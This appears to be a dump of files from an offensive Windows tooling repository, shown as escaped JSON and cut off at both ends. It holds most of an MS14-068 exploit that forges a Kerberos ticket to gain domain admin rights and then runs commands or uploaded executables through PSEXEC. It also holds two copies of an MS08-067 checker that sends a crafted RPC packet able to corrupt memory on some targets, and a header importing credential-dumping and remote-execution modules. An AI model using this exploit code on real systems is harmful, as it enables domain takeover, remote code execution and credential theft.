encodedApReq = encoder.encode(apReq)\n\n        tgsReq['pvno'] =  5\n        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)\n        tgsReq['padata'] = None\n        tgsReq['padata'][0] = None\n        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)\n        tgsReq['padata'][0]['padata-value'] = encodedApReq\n\n        pacRequest = KERB_PA_PAC_REQUEST()\n        pacRequest['include-pac'] = False\n        encodedPacRequest = encoder.encode(pacRequest)\n\n        tgsReq['padata'][1] = None\n        tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)\n        tgsReq['padata'][1]['padata-value'] = encodedPacRequest\n\n        message = encoder.encode(tgsReq)\n\n        r = sendReceive(message, domain, kdcHost)\n\n        # Get the session key\n        tgs = decoder.decode(r, asn1Spec = TGS_REP())[0]\n        cipherText = tgs['enc-part']['cipher']\n\n        # Key Usage 8\n        # TGS-REP encrypted part (includes application session\n        # key), encrypted with the TGS session key (Section 5.4.2)\n        plainText = cipher.decrypt(sessionKey, 8, str(cipherText))\n\n        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]\n\n        newSessionKey = Key(cipher.enctype, str(encTGSRepPart['key']['keyvalue']))\n    \n        return r, cipher, sessionKey, newSessionKey\n\n    def getForestSid(self):\n        logging.debug('Calling NRPC DsrGetDcNameEx()')\n\n        stringBinding = r'ncacn_np:%s[\\pipe\\netlogon]' % self.__kdcHost\n\n        rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n        if hasattr(rpctransport, 'set_credentials'):\n            rpctransport.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n        dce = rpctransport.get_dce_rpc()\n        dce.connect()\n        dce.bind(MSRPC_UUID_NRPC)\n\n        resp = hDsrGetDcNameEx(dce, NULL, NULL, NULL, NULL, 0)\n        forestName = resp['DomainControllerInfo']['DnsForestName'][:-1]\n        logging.debug('DNS Forest name is %s' % forestName)\n        dce.disconnect()\n\n        logging.debug('Calling LSAT hLsarQueryInformationPolicy2()')\n\n        stringBinding = r'ncacn_np:%s[\\pipe\\lsarpc]' % forestName\n\n        rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n        if hasattr(rpctransport, 'set_credentials'):\n            rpctransport.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n        dce = rpctransport.get_dce_rpc()\n        dce.connect()\n        dce.bind(MSRPC_UUID_LSAT)\n\n        resp = hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | POLICY_LOOKUP_NAMES)\n        policyHandle = resp['PolicyHandle']\n\n        resp = hLsarQueryInformationPolicy2(dce, policyHandle, POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)\n        dce.disconnect()\n\n        forestSid = resp['PolicyInformation']['PolicyAccountDomainInfo']['DomainSid'].formatCanonical()\n        logging.info(\"Forest SID: %s\"% forestSid)\n\n        return forestSid\n\n    def getDomainControllers(self):\n        logging.debug('Calling DRSDomainControllerInfo()')\n\n        stringBinding = epm.hept_map(self.__domain, MSRPC_UUID_DRSUAPI, protocol = 'ncacn_ip_tcp')\n\n        rpctransport = transport.DCERPCTransportFactory(stringBinding)\n        if hasattr(rpctransport, 'set_credentials'):\n            rpctransport.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n        dce = rpctransport.get_dce_rpc()\n        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)\n        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n        dce.connect()\n        dce.bind(MSRPC_UUID_DRSUAPI)\n\n        request = DRSBind()\n        request['puuidClientDsa'] = NTDSAPI_CLIENT_GUID\n        drs = DRS_EXTENSIONS_INT()\n        drs['cb'] = len(drs) #- 4\n        drs['dwFlags'] = DRS_EXT_GETCHGREQ_V6 | DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION\n        drs['SiteObjGuid'] = NULLGUID\n        drs['Pid'] = 0\n        drs['dwReplEpoch'] = 0\n        drs['dwFlagsExt'] = 0\n        drs['ConfigObjGUID'] = NULLGUID\n        drs['dwExtCaps'] = 127\n        request['pextClient']['cb'] = len(drs)\n        request['pextClient']['rgb'] = list(str(drs))\n        resp = dce.request(request)\n\n        dcs = hDRSDomainControllerInfo(dce,  resp['phDrs'], self.__domain, 1)\n\n        dce.disconnect()\n        domainControllers = list()\n        for dc in dcs['pmsgOut']['V1']['rItems']:\n            logging.debug('Found domain controller %s' % dc['DnsHostName'][:-1])\n            domainControllers.append(dc['DnsHostName'][:-1])\n\n        return domainControllers\n\n    def getUserSID(self):\n        stringBinding = r'ncacn_np:%s[\\pipe\\samr]' % self.__kdcHost\n\n        rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n        if hasattr(rpctransport, 'set_credentials'):\n            rpctransport.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n        dce = rpctransport.get_dce_rpc()\n        dce.connect()\n        dce.bind(samr.MSRPC_UUID_SAMR)\n        resp = samr.hSamrConnect(dce)\n        serverHandle = resp['ServerHandle']\n        resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, self.__domain)\n        domainId = resp['DomainId']\n        resp = samr.hSamrOpenDomain(dce, serverHandle, domainId = domainId)\n        domainHandle = resp['DomainHandle']\n        resp = samr.hSamrLookupNamesInDomain(dce, domainHandle, (self.__username,))\n        # Let's pick the relative ID\n        rid = resp['RelativeIds']['Element'][0]['Data']\n        logging.info(\"User SID: %s-%s\"% (domainId.formatCanonical(), rid))\n        return domainId, rid\n\n    def getOutput(self):\n\treturn totalOutput\n\t\n    def exploit(self):\n        if self.__kdcHost is None:\n            getDCs = True\n            self.__kdcHost = self.__domain\n        else:\n            getDCs = False\n        self.__domainSid, self.__rid = self.getUserSID()\n        try:\n            self.__forestSid = self.getForestSid()\n        except Exception, e:\n            # For some reason we couldn't get the forest data. No problem, we can still continue\n            # Only drawback is we won't get forest admin if successful\n            logging.error('Couldn\\'t get forest info (%s), continuing' % str(e))\n            self.__forestSid = None\n\n        if getDCs is False:\n            # User specified a DC already, no need to get the list\n            self.__domainControllers.append(self.__kdcHost)\n        else:\n            self.__domainControllers = self.getDomainControllers()\n        userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n        for dc in self.__domainControllers:\n            logging.info('Attacking domain controller %s' % dc)\n            self.__kdcHost = dc\n            exception = None\n            while True:\n                try:\n                    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n                                                                            self.__lmhash, self.__nthash, None,\n                                                                            self.__kdcHost, requestPAC=False)\n                except KerberosError, e:\n                    if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:\n                        # We might face this if the target does not support AES (most probably\n                        # Windows XP). So, if that's the case we'll force using RC4 by converting\n                        # the password to lm/nt hashes and hope for the best. If that's already\n                        # done, byebye.\n                        if self.__lmhash is '' and self.__nthash is '':\n                            from impacket.ntlm import compute_lmhash, compute_nthash\n                            self.__lmhash = compute_lmhash(self.__password)\n                            self.__nthash = compute_nthash(self.__password)\n                            continue\n                        else:\n                            exception = str(e)\n                            break\n                    else:\n                        exception = str(e)\n                        break\n\n                # So, we have the TGT, now extract the new session key and finish\n                asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]\n\n                # If the cypher in use != RC4 there's gotta be a salt for us to use\n                salt = ''\n                if asRep['padata']:\n                    for pa in asRep['padata']:\n                        if pa['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO2.value:\n                            etype2 = decoder.decode(str(pa['padata-value'])[2:], asn1Spec = ETYPE_INFO2_ENTRY())[0]\n                            salt = str(etype2['salt'])\n\n                cipherText = asRep['enc-part']['cipher']\n\n                # Key Usage 3\n                # AS-REP encrypted part (includes TGS session key or\n                # application session key), encrypted with the client key\n                # (Section 5.4.2)\n                if self.__nthash != '':\n                    key = Key(cipher.enctype,self.__nthash)\n                else:\n                    key = cipher.string_to_key(self.__password, salt, None)\n\n                plainText = cipher.decrypt(key, 3, str(cipherText))\n                encASRepPart = decoder.decode(plainText, asn1Spec = EncASRepPart())[0]\n                authTime = encASRepPart['authtime']\n\n                serverName = Principal('krbtgt/%s' % self.__domain.upper(),\n                                       type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n                tgs, cipher, oldSessionKey, sessionKey = self.getKerberosTGS(serverName, self.__domain, self.__kdcHost, tgt,\n                                                                             cipher, sessionKey, authTime)\n\n                # We've done what we wanted, now let's call the regular getKerberosTGS to get a new ticket for cifs\n                serverName = Principal('cifs/%s' % self.__target, type=constants.PrincipalNameType.NT_SRV_INST.value)\n                try:\n                    tgsCIFS, cipher, oldSessionKeyCIFS, sessionKeyCIFS = getKerberosTGS(serverName, self.__domain,\n                                                                                        self.__kdcHost, tgs, cipher,\n                                                                                        sessionKey)\n                except KerberosError, e:\n                    if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:\n                        # We might face this if the target does not support AES (most probably\n                        # Windows XP). So, if that's the case we'll force using RC4 by converting\n                        # the password to lm/nt hashes and hope for the best. If that's already\n                        # done, byebye.\n                        if self.__lmhash is '' and self.__nthash is '':\n                            from impacket.ntlm import compute_lmhash, compute_nthash\n                            self.__lmhash = compute_lmhash(self.__password)\n                            self.__nthash = compute_nthash(self.__password)\n                        else:\n                            exception = str(e)\n                            break\n                    else:\n                        exception = str(e)\n                        break\n                else:\n                    # Everything went well, let's save the ticket if asked and leave\n                    if self.__writeTGT is not None:\n                        from impacket.krb5.ccache import CCache\n                        ccache = CCache()\n                        ccache.fromTGS(tgs, oldSessionKey, sessionKey)\n                        ccache.saveFile(self.__writeTGT)\n                    break\n            if exception is None:\n                # Success!\n                logging.info('%s found vulnerable!' % dc)\n                break\n            else:\n                logging.info('%s seems not vulnerable (%s)' % (dc, exception))\n\n        if exception is None:\n            TGS = {}\n            TGS['KDC_REP'] = tgsCIFS\n            TGS['cipher'] = cipher\n            TGS['oldSessionKey'] = oldSessionKeyCIFS\n            TGS['sessionKey'] = sessionKeyCIFS\n\n            from impacket.smbconnection import SMBConnection as SMBConnection2\n            if self.__targetIp is None:\n                s = SMBConnection2('*SMBSERVER', self.__target)\n            else:\n                s = SMBConnection2('*SMBSERVER', self.__targetIp)\n            s.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, TGS=TGS,\n                            useCache=False)\n            if self.__command != 'None':\n                executer = PSEXEC1(self.__command, self.__username, self.__domain, s, TGS, self.__copyFile)\n                executer.run(self.__target)\n\nif __name__ == '__main__':\n    # Init the example's logger theme\n    logger.init()\n    import argparse\n    import sys\n    try:\n        import pyasn1\n    except ImportError:\n         logging.critical('This module needs pyasn1 installed')\n         logging.critical('You can get it from https://pypi.python.org/pypi/pyasn1')\n         sys.exit(1)\n    import datetime\n    from calendar import timegm\n    from time import strptime\n    from impacket import version\n    from impacket.smbserver import getFileTime\n    from impacket.dcerpc.v5 import samr\n    from impacket.dcerpc.v5 import transport\n    from impacket.krb5.types import Principal, Ticket, KerberosTime\n    from impacket.krb5 import constants\n    from impacket.krb5.kerberosv5 import sendReceive, getKerberosTGT, getKerberosTGS, KerberosError\n    from impacket.krb5.asn1 import AS_REP, TGS_REQ, AP_REQ, TGS_REP, Authenticator, EncASRepPart, AuthorizationData, \\\n        AD_IF_RELEVANT, seq_set, seq_set_iter, KERB_PA_PAC_REQUEST, \\\n        EncTGSRepPart, ETYPE_INFO2_ENTRY\n    from impacket.krb5.crypto import Key\n    from impacket.dcerpc.v5.ndr import NDRULONG\n    from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \\\n        SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD\n    from pyasn1.codec.der import decoder, encoder\n    from Crypto.Hash import MD5\n\n    print version.BANNER\n\n    parser = argparse.ArgumentParser(add_help=True,\n                                     description=\"MS14-068 Exploit. It establishes a SMBConnection and PSEXEcs the \"\n                                                 \"target or saves the TGT for later use.\")\n\n    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName>')\n    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n    parser.add_argument('command', nargs='*', default=' ',\n                        help='command (or arguments if -c is used) to execute at the target (w/o path). Defaults to '\n                             'cmd.exe. \\'None\\' will not execute PSEXEC (handy if you just want to save the ticket)')\n    parser.add_argument('-c', action='store', metavar=\"pathname\",\n                        help='uploads the filename for later execution, arguments are passed in the command option')\n    parser.add_argument('-w', action='store', metavar=\"pathname\",\n                        help='writes the golden ticket in CCache format into the <pathname> file')\n    parser.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n                        help='IP Address of the domain controller (needed to get the user''s SID). If ommited it use '\n                             'the domain part (FQDN) specified in the target parameter')\n    parser.add_argument('-target-ip', action='store', metavar=\"ip address\",\n                        help='IP Address of the target host you want to attack. If ommited it will use the targetName '\n                             'parameter')\n\n    group = parser.add_argument_group('authentication')\n\n    group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n    if len(sys.argv)==1:\n        parser.print_help()\n        print \"\\nExamples: \"\n        print \"\\tpython goldenPac domain.net/normaluser@domain-host\\n\"\n        print \"\\tthe password will be asked, or\\n\"\n        print \"\\tpython goldenPac.py domain.net/normaluser:mypwd@domain-host\\n\"\n        print \"\\tif domain.net and/or domain-machine do not resolve, add them\"\n        print \"\\tto the hosts file or explicity specify the domain IP (e.g. 1.1.1.1) and target IP:\\n\"\n        print \"\\tpython goldenPac.py -dc-ip 1.1.1.1 -target-ip 2.2.2.2 domain.net/normaluser:mypwd@domain-host\\n\"\n        print \"\\tThis will upload the xxx.exe file and execute it as: xxx.exe param1 param2 paramn\"\n        print \"\\tpython goldenPac.py -c xxx.exe domain.net/normaluser:mypwd@domain-host param1 param2 paramn\\n\"\n        sys.exit(1)\n \n    options = parser.parse_args()\n\n    import re\n    \n    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(\n        options.target).groups('')\n\n    #In case the password contains '@'\n    if '@' in address:\n        password = password + '@' + address.rpartition('@')[0]\n        address = address.rpartition('@')[2]\n\n    if domain is '':\n        logging.critical('Domain should be specified!')\n        sys.exit(1)\n\n    if options.debug is True:\n        logging.getLogger().setLevel(logging.DEBUG)\n    else:\n        logging.getLogger().setLevel(logging.INFO)\n\n    if password == '' and username != '' and options.hashes is None:\n        from getpass import getpass\n        password = getpass(\"Password:\")\n\n    commands = ' '.join(options.command)\n    if commands == ' ':\n        commands = 'cmd.exe'\n    dumper = MS14_068(address, options.target_ip, username, password, domain, options.hashes, commands, options.c,\n                      options.w, options.dc_ip)\n\n    try:\n        dumper.exploit()\n    except Exception, e:\n        #import traceback\n        #print traceback.print_exc()\n        logging.critical(str(e))\n\n"
  },
  {
    "path": "deps/ms08-067_check.py",
    "content": "#!/usr/bin/env python\n\n'''\nName: Microsoft Server Service Remote Path Canonicalization Stack Overflow Vulnerability\n\nDescription:\nAnonymously check if a target machine is affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)\n\nAuthor: Bernardo Damele A. G. <bernardo.damele@gmail.com>\n\nLicense: Modified Apache 1.1\n\nVersion: 0.6\n\nReferences:\n* BID: 31874\n* CVE: 2008-4250\n* MSB: MS08-067\n* VENDOR: http://blogs.technet.com/swi/archive/2008/10/25/most-common-questions-that-we-ve-been-asked-regarding-ms08-067.aspx\n* VENDOR: http://www.microsoft.com/technet/security/advisory/958963.mspx\n* MISC: http://www.phreedom.org/blog/2008/decompiling-ms08-067/\n* MISC: http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb\n* MISC: http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html\n* MISC: http://blogs.securiteam.com/index.php/archives/1150\n\nTested:\n* Windows 2000 Server Service Pack 0\n* Windows 2000 Server Service Pack 4 with Update Rollup 1\n* Microsoft 2003 Standard Service Pack 1\n* Microsoft 2003 Standard Service Pack 2 Full Patched at 22nd of October 2008, before MS08-067 patch was released\n\nNotes:\n* On Windows XP SP2 and SP3 this check might lead to a race condition and\n  heap corruption in the svchost.exe process, but it may not crash the\n  service immediately: it can trigger later on inside any of the shared\n  services in the process.\n'''\n\n\nimport socket\nimport sys\n\nfrom optparse import OptionError\nfrom optparse import OptionParser\nfrom random import choice\nfrom string import letters\nfrom struct import pack\nfrom threading import Thread\nfrom traceback import format_exc\n\n#try:\nfrom impacket import smb\nfrom impacket import uuid\nfrom impacket import dcerpc\nfrom impacket.dcerpc.v5 import transport\n#from impacket.dcerpc import dcerpc\n#from impacket.dcerpc import transport\n#except ImportError, _:\n#    print 'ERROR: this tool requires python-impacket library to be installed, get it '\n#    print 'from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket'\n#    sys.exit(1)\n\ntry:\n    from ndr import *\nexcept ImportError, _:\n    print 'ERROR: this tool requires python-pymsrpc library to be installed, get it '\n    print 'from http://code.google.com/p/pymsrpc/'\n    sys.exit(1)\n\n\nCMDLINE = True\nSILENT  = False\n\n\nclass connectionException(Exception):\n    pass\n\n\nclass MS08_067(Thread):\n    def __init__(self, target, port=445):\n        super(MS08_067, self).__init__()\n\n        self.__port   = port\n        self.target   = target\n        self.status   = 'unknown'\n\n\n    def __checkPort(self):\n        try:\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            s.settimeout(1)\n            s.connect((self.target, self.__port))\n            s.close()\n\n        except socket.timeout, _:\n            raise connectionException, 'connection timeout'\n\n        except socket.error, _:\n            raise connectionException, 'connection refused'\n\n\n    def __connect(self):\n        try:\n            self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % self.target)\n            self.__trans.connect()\n\n        except smb.SessionError, _:\n            raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'\n\n        except:\n            #raise Exception, 'unhandled exception (%s)' % format_exc()\n            print \"unexpected exception\"\n            raise connectionException, 'unexpected exception'\n\n\n    def __bind(self):\n        '''\n        DCERPC bind to SRVSVC (Server Service) endpoint\n        Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html\n        '''\n\n        try:\n            self.__dce = self.__trans.DCERPC_class(self.__trans)\n\n            self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))\n\n        except socket.error, _:\n            raise connectionException, 'unable to bind to SRVSVC endpoint'\n\n        except:\n            #raise Exception, 'unhandled exception (%s)' % format_exc()\n            raise connectionException, 'unexpected exception'\n\n\n    def __forgePacket(self):\n        '''\n        Forge the malicious NetprPathCompare packet\n\n        Reference: http://msdn.microsoft.com/en-us/library/cc247259.aspx\n\n        long NetprPathCompare(\n          [in, string, unique] SRVSVC_HANDLE ServerName,\n          [in, string] WCHAR* PathName1,\n          [in, string] WCHAR* PathName2,\n          [in] DWORD PathType,\n          [in] DWORD Flags\n        );\n        '''\n\n        self.__path = ''.join([choice(letters) for _ in xrange(0, 3)])\n\n        self.__request  = ndr_unique(pointer_value=0x00020000, data=ndr_wstring(data='')).serialize()\n        self.__request += ndr_wstring(data='\\\\%s\\\\..\\\\%s' % ('A'*5, self.__path)).serialize()\n        self.__request += ndr_wstring(data='\\\\%s' % self.__path).serialize()\n        self.__request += ndr_long(data=1).serialize()\n        self.__request += ndr_long(data=0).serialize()\n\n\n    def __compare(self):\n        '''\n        Compare NetprPathCompare response field 'Windows Error' with the\n        expected value (WERR_OK) to confirm the target is vulnerable\n        '''\n\n        self.__vulnerable = pack('<L', 0)\n\n        # The target is vulnerable if the NetprPathCompare response field\n        # 'Windows Error' is WERR_OK (0x00000000)\n        if self.__response == self.__vulnerable:\n            self.status = 'VULNERABLE'\n        else:\n            self.status = 'not vulnerable'\n\n        self.result()\n\n\n    def result(self):\n        if self.status in ('VULNERABLE', 'not vulnerable'):\n           print '%s: %s' % (self.target, self.status)\n        else:\n           print '%s: %s' % (self.target, self.status)\n\n\n    def run(self):\n        try:\n            self.__checkPort()\n            self.__connect()\n            self.__bind()\n            print \"here\"\n        except connectionException, e:\n            self.status = e\n            self.result()\n            #return None\n            return e\n\n        # Forge and send the NetprPathCompare operation malicious packet\n        self.__forgePacket()\n        self.__dce.call(32, self.__request)\n\n        # Get back the NetprPathCompare response and check if it is vulnerable\n        self.__response = self.__dce.recv()\n        self.__compare()\n\n\n#if __name__ == '__main__':\n#    CMDLINE = True\n#    target=sys.argv[1]\n#    current = MS08_067(target)\n#    current.start()\n"
  },
  {
    "path": "deps/ms08_067.py",
    "content": "#!/usr/bin/env python\n\n'''\nName: Microsoft Server Service Remote Path Canonicalization Stack Overflow Vulnerability\n\nDescription:\nAnonymously check if a target machine is affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)\n\nAuthor: Bernardo Damele A. G. <bernardo.damele@gmail.com>\n\nLicense: Modified Apache 1.1\n\nVersion: 0.6\n\nReferences:\n* BID: 31874\n* CVE: 2008-4250\n* MSB: MS08-067\n* VENDOR: http://blogs.technet.com/swi/archive/2008/10/25/most-common-questions-that-we-ve-been-asked-regarding-ms08-067.aspx\n* VENDOR: http://www.microsoft.com/technet/security/advisory/958963.mspx\n* MISC: http://www.phreedom.org/blog/2008/decompiling-ms08-067/\n* MISC: http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb\n* MISC: http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html\n* MISC: http://blogs.securiteam.com/index.php/archives/1150\n\nTested:\n* Windows 2000 Server Service Pack 0\n* Windows 2000 Server Service Pack 4 with Update Rollup 1\n* Microsoft 2003 Standard Service Pack 1\n* Microsoft 2003 Standard Service Pack 2 Full Patched at 22nd of October 2008, before MS08-067 patch was released\n\nNotes:\n* On Windows XP SP2 and SP3 this check might lead to a race condition and\n  heap corruption in the svchost.exe process, but it may not crash the\n  service immediately: it can trigger later on inside any of the shared\n  services in the process.\n'''\n\n\nimport socket\nimport sys\n\nfrom optparse import OptionError\nfrom optparse import OptionParser\nfrom random import choice\nfrom string import letters\nfrom struct import pack\nfrom threading import Thread\nfrom traceback import format_exc\n\n#try:\nfrom impacket import smb\nfrom impacket import uuid\nfrom impacket import dcerpc\nfrom impacket.dcerpc.v5 import transport\n#from impacket.dcerpc import dcerpc\n#from impacket.dcerpc import transport\n#except ImportError, _:\n#    print 'ERROR: this tool requires python-impacket library to be installed, get it '\n#    print 'from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket'\n#    sys.exit(1)\n\ntry:\n    from ndr import *\nexcept ImportError, _:\n    print 'ERROR: this tool requires python-pymsrpc library to be installed, get it '\n    print 'from http://code.google.com/p/pymsrpc/'\n    sys.exit(1)\n\n\nCMDLINE = False\nSILENT  = False\n\n\nclass connectionException(Exception):\n    pass\n\n\nclass MS08_067(Thread):\n    def __init__(self, target, port=445):\n        super(MS08_067, self).__init__()\n\n        self.__port   = port\n        self.target   = target\n        self.status   = 'unknown'\n\n\n    def __checkPort(self):\n        '''\n        Open connection to TCP port to check if it is open\n        '''\n\n        try:\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            s.settimeout(1)\n            s.connect((self.target, self.__port))\n            s.close()\n\n        except socket.timeout, _:\n            raise connectionException, 'connection timeout'\n\n        except socket.error, _:\n            raise connectionException, 'connection refused'\n\n\n    def __connect(self):\n        '''\n        SMB connect to the Computer Browser service named pipe\n        Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html\n        '''\n\n        try:\n            self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % self.target)\n            self.__trans.connect()\n\n        except smb.SessionError, _:\n            raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'\n\n        except:\n            #raise Exception, 'unhandled exception (%s)' % format_exc()\n            raise connectionException, 'unexpected exception'\n\n\n    def __bind(self):\n        '''\n        DCERPC bind to SRVSVC (Server Service) endpoint\n        Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html\n        '''\n\n        try:\n            self.__dce = self.__trans.DCERPC_class(self.__trans)\n\n            self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))\n\n        except socket.error, _:\n            raise connectionException, 'unable to bind to SRVSVC endpoint'\n\n        except:\n            #raise Exception, 'unhandled exception (%s)' % format_exc()\n            raise connectionException, 'unexpected exception'\n\n\n    def __forgePacket(self):\n        '''\n        Forge the malicious NetprPathCompare packet\n\n        Reference: http://msdn.microsoft.com/en-us/library/cc247259.aspx\n\n        long NetprPathCompare(\n          [in, string, unique] SRVSVC_HANDLE ServerName,\n          [in, string] WCHAR* PathName1,\n          [in, string] WCHAR* PathName2,\n          [in] DWORD PathType,\n          [in] DWORD Flags\n        );\n        '''\n\n        self.__path = ''.join([choice(letters) for _ in xrange(0, 3)])\n\n        self.__request  = ndr_unique(pointer_value=0x00020000, data=ndr_wstring(data='')).serialize()\n        self.__request += ndr_wstring(data='\\\\%s\\\\..\\\\%s' % ('A'*5, self.__path)).serialize()\n        self.__request += ndr_wstring(data='\\\\%s' % self.__path).serialize()\n        self.__request += ndr_long(data=1).serialize()\n        self.__request += ndr_long(data=0).serialize()\n\n\n    def __compare(self):\n        '''\n        Compare NetprPathCompare response field 'Windows Error' with the\n        expected value (WERR_OK) to confirm the target is vulnerable\n        '''\n\n        self.__vulnerable = pack('<L', 0)\n\n        # The target is vulnerable if the NetprPathCompare response field\n        # 'Windows Error' is WERR_OK (0x00000000)\n        if self.__response == self.__vulnerable:\n            self.status = 'VULNERABLE'\n        else:\n            self.status = 'not vulnerable'\n\n        self.result()\n\n\n    def result(self):\n        if CMDLINE == True and self.status in ('VULNERABLE', 'not vulnerable'):\n           print '%s: %s' % (self.target, self.status)\n        elif CMDLINE == True and SILENT != True:\n           print '%s: %s' % (self.target, self.status)\n\n\n    def run(self):\n        try:\n            self.__checkPort()\n            self.__connect()\n            self.__bind()\n        except connectionException, e:\n            self.status = e\n            self.result()\n            return None\n\n        # Forge and send the NetprPathCompare operation malicious packet\n        self.__forgePacket()\n        self.__dce.call(32, self.__request)\n\n        # Get back the NetprPathCompare response and check if it is vulnerable\n        self.__response = self.__dce.recv()\n        self.__compare()\n\n\nif __name__ == '__main__':\n    CMDLINE = True\n    target=sys.argv[1]\n    current = MS08_067(target)\n    current.start()\n"
  },
  {
    "path": "deps/ms14_068.py",
    "content": "#/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom psexec import *\nfrom wmiexec import *\nfrom secretsdump import *\nfrom goldenPac import *\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import MD5\nfrom base64 import b64decode\nfrom base64 import b64encode\nfrom binascii import unhexlify\nfrom calendar import timegm\nfrom dns import reversename, resolver\nfrom impacket import tds\nfrom impacket import version\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY,  RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_NONE\nfrom impacket.examples import logger\nfrom impacket.structure import Structure\nfrom impacket.system_errors import ERROR_NO_MORE_ITEMS\nfrom impacket.tds import TDS_ERROR_TOKEN, TDS_LOGINACK_TOKEN\nfrom impacket.winregistry import hexdump\nfrom multiprocessing import Pool\nfrom multiprocessing import Pool               \nfrom netaddr import IPNetwork\nfrom nmb.NetBIOS import NetBIOS\nfrom os import kill\nfrom pyasn1.codec.der import decoder, encoder\nfrom signal import alarm, signal, SIGALRM, SIGKILL\nfrom smb.SMBConnection import SMBConnection as SMBConnection1\nfrom socket import * \nfrom struct import *\nfrom struct import unpack\nfrom subprocess import Popen\nfrom subprocess import Popen, PIPE \nfrom tabulate import tabulate\nfrom termcolor import colored, cprint\nfrom threading import Thread, Lock\nfrom time import strptime\nimport Crypto.Cipher.DES\nimport Queue\nimport argparse\nimport base64\nimport binascii\nimport cmd\nimport codecs\nimport commands\nimport datetime\nimport logging\nimport ntpath\nimport optparse\nimport os\nimport pyasn1\nimport random\nimport re\nimport socket\nimport socket,commands,sys\nimport string\nimport subprocess\nimport sys\nimport tempfile\nimport threading\nimport time\nimport unicodedata\nimport xmltodict\nfrom SocketServer import ThreadingMixIn, ForkingMixIn\nfrom BaseHTTPServer import HTTPServer\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\n\ntry:\n    import pyasn1\nexcept ImportError:\n     logging.critical('This module needs pyasn1 installed')\n     logging.critical('You can get it from https://pypi.python.org/pypi/pyasn1')\n     sys.exit(1)\n\n'''\nPrerequisites\napt install autoconf automake autopoint libtool pkg-config\ngit clone https://github.com/libyal/libesedb.git\ncd libesedb/\n./synclibs.sh\n./autogen.sh\ngit clone https://github.com/csababarta/ntdsxtract\ncd ntdsxtract\npython setup.py install\n'''\n\noptionMS14068=False\noptionTokenPriv=False\n\ndemo=True\ndebugMode=False\n\nverbose=False\nrunAllModules=True\nclient_machine_name = 